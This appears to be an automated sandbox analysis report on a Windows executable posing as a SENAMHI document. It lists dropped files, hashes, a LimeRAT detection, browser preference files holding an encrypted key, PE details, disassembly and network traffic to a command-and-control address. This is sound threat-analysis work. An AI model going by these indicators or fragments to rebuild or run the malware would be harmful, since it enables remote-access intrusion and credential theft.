                                                                            Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L...BW.[.........."!.........f......)........................................p......3R....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):137168
                                                                            Entropy (8bit):6.782906762178928
                                                                            Encrypted:false
                                                                            SSDEEP:3072:4kdWyaKm15vd/q/Py9UbfkVgxp1qt/t3PvT4UD2JJJvPBrSezRy:Fdtm15vtSfkVgxp12/t3PLxD2JJJvPQZ
                                                                            MD5:75F8CC548CABF0CC800C25047E4D3124
                                                                            SHA1:602676768F9FAECD35B48C38A0632781DFBDE10C
                                                                            SHA-256:FB419A60305F17359E2AC0510233EE80E845885EEE60607715C67DD88E501EF0
                                                                            SHA-512:ED831C9C769AEF3BE253C52542CF032AFA0A8FA5FE25CA704DB65EE6883C608220DF7102AC2B99EE9C2E599A0F5DB99FD86894A4B169E68440EB1B0D0012672F
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L....T.[.........."!.....z...................................................@............@A........................ ...t.......,.... ..x....................0..h......T...................4.......H...@...................L........................text....x.......z.................. ..`.rdata..>e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):440120
                                                                            Entropy (8bit):6.652844702578311
                                                                            Encrypted:false
                                                                            SSDEEP:12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
                                                                            MD5:109F0F02FD37C84BFC7508D4227D7ED5
                                                                            SHA1:EF7420141BB15AC334D3964082361A460BFDB975
                                                                            SHA-256:334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
                                                                            SHA-512:46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):1246160
                                                                            Entropy (8bit):6.76559888004065
                                                                            Encrypted:false
                                                                            SSDEEP:24576:Ab5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRpMxkxo:+zW5ygDwnEZIYkjgWjblMSRpMqm
                                                                            MD5:D7858E8449004E21B01D468E9FD04B82
                                                                            SHA1:9524352071EDE21C167E7E4F106E9526DC23EF4E
                                                                            SHA-256:78758BF7F3B3B5E3477E38354ACD32D787BC1286C8BD9B873471B9C195E638DB
                                                                            SHA-512:1E2C981E6C0CA36C60C6E9CAE9548B866D5C524DF837095B30D618D9C322DEF7134C20DE820105400DD1B58076B66D90274F67773AC6BA914F611B419BABB440
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                            • Antivirus: ReversingLabs, Detection: 3%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L...#W.[.........."!................w........................................@...........@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):144848
                                                                            Entropy (8bit):6.539673483315818
                                                                            Encrypted:false
                                                                            SSDEEP:3072:0Af6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWPqeFYMMa:J6PbsF4CoT2OeN43Ma
                                                                            MD5:471C983513694AC3002590345F2BE0DA
                                                                            SHA1:6612B9AF4FF6830FA9B7D4193078434EF72F775B
                                                                            SHA-256:BB3FF746471116C6AD0339FA0522AA2A44A787E33A29C7B27649A054ECD4D00F
                                                                            SHA-512:A9B0FB923BC3B567E933DE10B141A3E9213640E3D790B4C4D753CF220D55593AE8026102909969BA6BFC22DA3B2FCD01E30A9F5A74BD14A0FDEC9BEAF0FB1410
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L...+W.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
                                                                            File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):83784
                                                                            Entropy (8bit):6.890347360270656
                                                                            Encrypted:false
                                                                            SSDEEP:1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
                                                                            MD5:7587BF9CB4147022CD5681B015183046
                                                                            SHA1:F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
                                                                            SHA-256:C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
                                                                            SHA-512:0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
                                                                            Malicious:false
                                                                            Antivirus:
                                                                            • Antivirus: Metadefender, Detection: 0%, Browse
                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):31120
                                                                            Entropy (8bit):5.364337769056878
                                                                            Encrypted:false
                                                                            SSDEEP:384:LZiIuERzA83h09RZxGgEQd/IyihUW3l38yLgncYrPZYHgs:8IuERzA83h09RZxVdN/s38yL+V0
                                                                            MD5:B99DAAD25177AB9BA376160A2E47D8AF
                                                                            SHA1:17EB84C40474B95EED9F724D3384588D0DF07D73
                                                                            SHA-256:D330594D6AD57183F4FE42D59A139C0516629EE27EF0B1012231564660A4187C
                                                                            SHA-512:7A7B0CFBC101F9196379CFD0841E9281A372737D2DA369DE231763A0C8E2E55F781E2DA776803679CCFFF009ED41D8FC1A988824BCFB4AD642798B885D9980A2
                                                                            Malicious:false
                                                                            Preview:{"abusive_adblocker_etag":"\"1632267943\"","browser":{"last_redirect_origin":""},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"edge":{"perf_center":{"performance_mode":3,"performance_mode_is_on":false,"performance_mode_main_toggle":false}},"external_config_domain_actions":{"cdm_override":{"applications":[{"applied_policy":"OnlyExposePlayReady","domain":"sling.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tou.tv"},{"applied_policy":"OnlyExposeWidevine","domain":"maxdome.de"},{"applied_policy":"OnlyExposeWidevine","domain":"abc.com"},{"applied_policy":"OnlyExposeWidevine","domain":"tv.apple.com"},{"applied_policy":"OnlyExposeWidevine","domain":"la7.it"},{"applied_policy":"OnlyExposeWidevine","domain":"xfinity.com"},{"applied_policy":"OnlyExposeWidevine","domain":"watchtv.cox.com"},{"applied_policy":"OnlyExposeWidevine","domain":"ignitetv.rogers.com"},{"applied_policy":"OnlyExposeWidevine","domain":"b
                                                                            Process:C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3036000
                                                                            Category:dropped
                                                                            Size (bytes):45056
                                                                            Entropy (8bit):0.7853305971874845
                                                                            Encrypted:false
                                                                            SSDEEP:48:43b/DVIIgyZKLk8s8LKvUf9K4UKTgyJqhtcebVEq8Ma0D0HOlcjlGxdKmtAONu41:Sb+uKLyeym/grcebn8MouOjlGxdKmt3N
                                                                            MD5:00C036C61F625BF9D25362B9BE24ADEB
                                                                            SHA1:6738C3D037E4A2E9F41B1398BA88E5771532F593
                                                                            SHA-256:0C187B091E99E5BB665C59F8F8E027D5658904B32E4196D2EB402F3B1CAD69EF
                                                                            SHA-512:711265BC8C1653BF6E862343BF3149A2AB09F4BA7D38E2D8A437001DB6C0F1936F6362571DD577CD7BDBEEC766DF141CB7E0681512C12E25A99CDB71731232D1
                                                                            Malicious:false
                                                                            Preview:SQLite format 3......@ ..........................................................................S`....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            Process:C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):107327
                                                                            Entropy (8bit):6.072662776306198
                                                                            Encrypted:false
                                                                            SSDEEP:3072:TP4c1bwI28KFb70xHPvRMnjgxOR5bEkkVbWiKaG:D4Ez2z7sRMjgo5SVb/8
                                                                            MD5:648A9762131071FD5DEC551A1FBC5DF3
                                                                            SHA1:27DC4E5024812CFE8B4542F30082AF439EC3CFC0
                                                                            SHA-256:2FAB6FC8E6C8506644E14C81296493AE5A760D9DBF48E59452C328A27FDE1D07
                                                                            SHA-512:784F1B5A397B228B30DDE97EDEDEAC4C94985FB66F1608962978B3AB1E3A97668234F0DCFC3C6BB9E58F7A2E92E5A56D33BFAE8C2DA6C03501D803F94F6A955E
                                                                            Malicious:false
                                                                            Preview:{"autofill":{"states_data_dir":"C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\AutofillStates\\2020.11.2.164946"},"browser":{"last_redirect_origin":"","shortcut_migration_version":"92.0.4515.159"},"chrome_cleaner":{"scan_completion_time":"13276779605137578"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"hardware_acceleration_mode_previous":true,"intl":{"app_locale":"en"},"legacy":{"profile":{"name":{"migrated":true}}},"network_time":{"network_time_mapping":{"local":1.642668702858488e+12,"network":1.642668703e+12,"ticks":60687044.0,"uncertainty":1230605.0}},"os_crypt":{"encrypted_key":"RFBBUEkBAAAA0Iyd3wEV0RGMegDAT8KX6wEAAAAb7qWBj3YRSZSg2yN3JOzDAAAAAAIAAAAAABBmAAAAAQAAIAAAAIi9IkqThTzoDjz/SbzVMN6ojv2e+IWxi1hNPZekZpvHAAAAAA6AAAAAAgAAIAAAAAUAxx69p6cLu26Q2Hr4RmGMSdZydqsFEbXDuU/DQjNBMAAAAIjUciIMZJVdhTeHew42TuNasyfPQ/tWU5NsLVjboe0zHjtdzkC5ew1pmiCHlSxe20AAAADHMdJi6EMHqPhkdh83Av+0ljq5qSldx4HBU10VdDSmk
                                                                            Process:C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):29184
                                                                            Entropy (8bit):5.951469681811296
                                                                            Encrypted:false
                                                                            SSDEEP:384:cB+Sbj6NKom4r+65xAH6kgvqDc0gpEkvDKNrCeJE3WNgP0bVjeNwsN4jhxUQro3C:6pomn65xw6p0gpEK45N62YNw44VxWij
                                                                            MD5:3D7801D573CAB12F3093C219EBFE495C
                                                                            SHA1:E1AD7BE4BA84E44E4EE4339232B984D29C1328D1
                                                                            SHA-256:21B86512DE83574C3AD44210D025E93FB28D205CFBD18825DA0A64A52063B627
                                                                            SHA-512:844418BEE9DFC603211E2B7E989879B97523ADC18630F0EA1B8D93377B3D5FD867A19FFD0AF0AC3867D35FC5C8231A1ABBBF11F24F8784AB6349AFD27AC30CC5
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, Author: Joe Security
                                                                            • Rule: MALWARE_Win_LimeRAT, Description: LimeRAT payload, Source: C:\Users\user\AppData\Roaming\wtqsCpda..exe, Author: ditekSHen
                                                                            Antivirus:
                                                                            • Antivirus: Avira, Detection: 100%
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 93%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L... .)b.................n..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tm... ...n.................. ..`.reloc...............p..............@..B........................................................P.......H.......`G...E......V.....................................................(....*..(....*.s.........s.........s.........s.........*.~....o....*.~....o....*.~....o....*.~....o....*6..(....(....*..(....*......(....*..(....*.0................-.(...+.+....*".......*..(....*r~.........-.(...+.....~....*...0..........(....-W(....o....o....r...p(....o....-7r...p(....-+(....-$( ...-.r...p(!...r-..p("...(#...-..ArI..p($...((...r...p(%...r...p(&......('...&((.....%()....(*.....*........
                                                                            Process:C:\Users\user\Desktop\DocumentoSENAMHI20222103.exe
                                                                            File Type:SQLite 3.x database, last written using SQLite version 3035005
                                                                            Category:dropped
                                                                            Size (bytes):49152
                                                                            Entropy (8bit):0.8182303930711242
                                                                            Encrypted:false
                                                                            SSDEEP:96:+RMKLyeymwxCn8MZyFltK3PlGNxot83n:+RkxGO8PlGNxz
                                                                            MD5:A93B35941137916187814E3E7C88C93D
                                                                            SHA1:3834E7B2A614BD688831CFC47786729F6CAC0121
                                                                            SHA-256:0D1DC0E9F4C9BE281E17D24AC969E0FF3F8388114420417126A4F502EABC3107
                                                                            SHA-512:84A749B77BBED02944C9B25D1B98C638B3DBB906A2A222FF9FB229C7AC0C8A64D123D1CB47A1E9A88FB9E67BAD0928FE1C952152F30311EFC6C8B9330B9441B4
                                                                            Malicious:false
                                                                            Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):2.7480998924776148
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:DocumentoSENAMHI20222103.exe
                                                                            File size:1320960
                                                                            MD5:81ba3d2de48272d692c4e6604e6b1db9
                                                                            SHA1:921e7008881d5e0e9a788ee310ddef60b343c647
                                                                            SHA256:eef5ae48384a5c5dff5d4c7b1a768c4eb1fe5d3df0347c85c9c1b404327dbba9
                                                                            SHA512:f53f5aef705bbce8ba6c8d7013425b274ca74b562a832fa9986a7000d14a8bf163869db503e8d6682c4773dea9ddd67fc8ad1a9a78f7a3e98309c9ba540ec89a
                                                                            SSDEEP:6144:aNk8vti3OqUP1bq00RiTwSltgxCKYPMXq9NmiQBYGhpX8x4MWy1FYCz8hJ2n3C+e:Ak8l7D4pa7+ocZ
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V\-..=C..=C..=C..V@..=C..VF..=C.pEG..=C.pE@..=C.pEF.#=C..VE..=C..VG..=C..VB..=C..=B..=C..DJ..=C..D...=C..=...=C..DA..=C.Rich.=C
                                                                            Icon Hash:00828e8e8686b000
                                                                            Entrypoint:0x404718
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                            DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                            Time Stamp:0x6237B381 [Sun Mar 20 23:06:41 2022 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:0
                                                                            File Version Major:6
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:5ed77736e49da7d22b203d8d8f918a6b
                                                                            Instruction
                                                                            call 00007F06FCC28733h
                                                                            jmp 00007F06FCC2809Fh
                                                                            retn 0000h
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            int3
                                                                            push 00405570h
                                                                            push dword ptr fs:[00000000h]
                                                                            mov eax, dword ptr [esp+10h]
                                                                            mov dword ptr [esp+10h], ebp
                                                                            lea ebp, dword ptr [esp+10h]
                                                                            sub esp, eax
                                                                            push ebx
                                                                            push esi
                                                                            push edi
                                                                            mov eax, dword ptr [00419008h]
                                                                            xor dword ptr [ebp-04h], eax
                                                                            xor eax, ebp
                                                                            push eax
                                                                            mov dword ptr [ebp-18h], esp
                                                                            push dword ptr [ebp-08h]
                                                                            mov eax, dword ptr [ebp-04h]
                                                                            mov dword ptr [ebp-04h], FFFFFFFEh
                                                                            mov dword ptr [ebp-08h], eax
                                                                            lea eax, dword ptr [ebp-10h]
                                                                            mov dword ptr fs:[00000000h], eax
                                                                            ret
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            and dword ptr [00542724h], 00000000h
                                                                            sub esp, 24h
                                                                            or dword ptr [00419010h], 01h
                                                                            push 0000000Ah
                                                                            call dword ptr [0041122Ch]
                                                                            test eax, eax
                                                                            je 00007F06FCC283D2h
                                                                            and dword ptr [ebp-10h], 00000000h
                                                                            xor eax, eax
                                                                            push ebx
                                                                            push esi
                                                                            push edi
                                                                            xor ecx, ecx
                                                                            lea edi, dword ptr [ebp-24h]
                                                                            push ebx
                                                                            cpuid
                                                                            mov esi, ebx
                                                                            pop ebx
                                                                            nop
                                                                            mov dword ptr [edi], eax
                                                                            mov dword ptr [edi+04h], esi
                                                                            mov dword ptr [edi+08h], ecx
                                                                            xor ecx, ecx
                                                                            mov dword ptr [edi+0Ch], edx
                                                                            mov eax, dword ptr [ebp-24h]
                                                                            mov edi, dword ptr [ebp-20h]
                                                                            mov dword ptr [ebp-0Ch], eax
                                                                            xor edi, 756E6547h
                                                                            mov eax, dword ptr [ebp-18h]
                                                                            xor eax, 49656E69h
                                                                            mov dword ptr [ebp-04h], eax
                                                                            mov eax, dword ptr [ebp-1Ch]
                                                                            xor eax, 6C65746Eh
                                                                            mov dword ptr [ebp-08h], eax
                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x174a00x78.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x1430000xd28.rsrc
                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x1440000x12dc.reloc
                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x163800x54.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x162c00x40.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x110000x278.rdata
                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                            .text0x10000xf9cd0xfa00False0.605875data6.61019563742IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                            .rdata0x110000x73220x7400False0.416386045259data4.90923942869IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .data0x190000x129e780x129400False0.133941830057data2.29312173446IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                            .rsrc0x1430000xd280xe00False0.339006696429data3.85073462575IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                            .reloc0x1440000x12dc0x1400False0.7365234375data6.39751442919IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                            NameRVASizeTypeLanguageCountry
                                                                            REGISTRY0x1434d00xaaASCII textEnglishUnited States
                                                                            TYPELIB0x1436a00x4d0dataEnglishUnited States
                                                                            RT_DIALOG0x1435800x11adataEnglishUnited States
                                                                            RT_STRING0x143b700x32dataEnglishUnited States
                                                                            RT_VERSION0x1431f00x2dcdataEnglishUnited States
                                                                            RT_MANIFEST0x143ba80x17dXML 1.0 document textEnglishUnited States
                                                                            DLLImport
                                                                            KERNEL32.dllDecodePointer, DeleteCriticalSection, GetTickCount, AcquireSRWLockExclusive, AssignProcessToJobObject, CompareStringW, ConnectNamedPipe, CreateDirectoryW, CreateEventW, CreateFileMappingW, CreateFileW, CreateIoCompletionPort, CreateJobObjectW, CreateMutexW, CreateNamedPipeW, CreateProcessW, CreateRemoteThread, CreateSemaphoreW, DebugBreak, DeleteFileW, DisconnectNamedPipe, DuplicateHandle, EncodePointer, EnterCriticalSection, EnumSystemLocalesEx, EnumSystemLocalesW, ExitProcess, ExpandEnvironmentStringsW, FileTimeToSystemTime, FindClose, FindFirstFileExW, FindNextFileW, FlushFileBuffers, FlushViewOfFile, FormatMessageA, FreeEnvironmentStringsW, FreeLibrary, GetACP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetComputerNameExW, GetConsoleCP, GetConsoleMode, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThread, GetDateFormatW, GetDriveTypeW, GetEnvironmentStringsW, GetExitCodeProcess, GetFileAttributesW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetFileSizeEx, GetFileType, GetFullPathNameW, GetLocalTime, GetLocaleInfoW, GetLongPathNameW, CreateThread, GetModuleHandleA, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetOEMCP, GetProcAddress, GetProcessHandleCount, GetProcessHeaps, GetProcessId, GetProcessTimes, GetQueuedCompletionStatus, GetStartupInfoW, GetStdHandle, GetStringTypeW, GetSystemDefaultLCID, GetSystemDirectoryW, GetSystemInfo, GetSystemTimeAsFileTime, GetTempPathW, GetThreadContext, GetThreadId, GetThreadLocale, GetThreadPriority, GetTimeFormatW, GetTimeZoneInformation, GetUserDefaultLCID, GetUserDefaultLangID, GetUserDefaultLocaleName, GetModuleFileNameA, SizeofResource, VirtualProtect, SetLastError, VirtualAlloc, LoadLibraryExA, LeaveCriticalSection, FindResourceA, Sleep, IsDBCSLeadByte, LoadResource, WideCharToMultiByte, lstrcmpiA, GetConsoleOutputCP, SetFilePointerEx, SetStdHandle, IsValidCodePage, HeapReAlloc, HeapSize, LCMapStringW, WriteFile, VirtualQuery, LoadLibraryExW, TlsFree, TlsSetValue, TlsGetValue, TlsAlloc, InitializeCriticalSectionAndSpinCount, RaiseException, CloseHandle, GetLastError, MultiByteToWideChar, GetCurrentThreadId, InitializeCriticalSectionEx, GetModuleFileNameW, RtlUnwind, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsProcessorFeaturePresent, InitializeSListHead, GetProcessHeap, HeapFree, IsDebuggerPresent, OutputDebugStringW, HeapAlloc, WriteConsoleW
                                                                            USER32.dllCharNextA, MessageBoxA
                                                                            ADVAPI32.dllRegQueryInfoKeyW, RegDeleteKeyA, RegCreateKeyExA, RegSetValueExA, RegOpenKeyExA, RegDeleteValueA, RegEnumKeyExA, RegCloseKey
                                                                            ole32.dllCoCreateInstance, CoTaskMemFree, CoTaskMemRealloc, CoTaskMemAlloc
                                                                            OLEAUT32.dllVarUI4FromStr
                                                                            DescriptionData
                                                                            LegalCopyright Microsoft Corporation. All rights reserved.
                                                                            InternalNameMultiRead
                                                                            FileVersion1, 0, 0, 1
                                                                            ProductNameMultiRead Module
                                                                            ProductVersion1, 0, 0, 1
                                                                            FileDescriptionMultiRead Module
                                                                            OriginalFilenameMultiRead.EXE
                                                                            Translation0x0409 0x04b0
                                                                            Language of compilation systemCountry where language is spokenMap
                                                                            EnglishUnited States
                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Mar 21, 2022 14:44:44.784579039 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:44:44.826292992 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:44:44.826538086 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:44:44.866643906 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:44:44.917386055 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:44:46.099622011 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:44:46.191586018 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:44:46.191657066 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:44:46.191708088 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:44:46.192142963 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:44:46.561424971 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:44:46.662405014 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:44:47.753345966 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:44:47.825952053 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:44:47.827121019 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:44:47.827198029 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:44:47.827254057 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:44:47.827426910 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:44:47.827491999 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:44:47.827739954 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:44:47.827807903 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:44:47.827863932 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:44:47.827965975 CET497612031192.168.11.20172.111.242.20
                                                                            Mar 21, 2022 14:44:47.832956076 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:44:47.833034039 CET203149761172.111.242.20192.168.11.20
                                                                            Mar 21, 2022 14:44:47.833091974 CET203149761172.111.242.20192.168.11.20
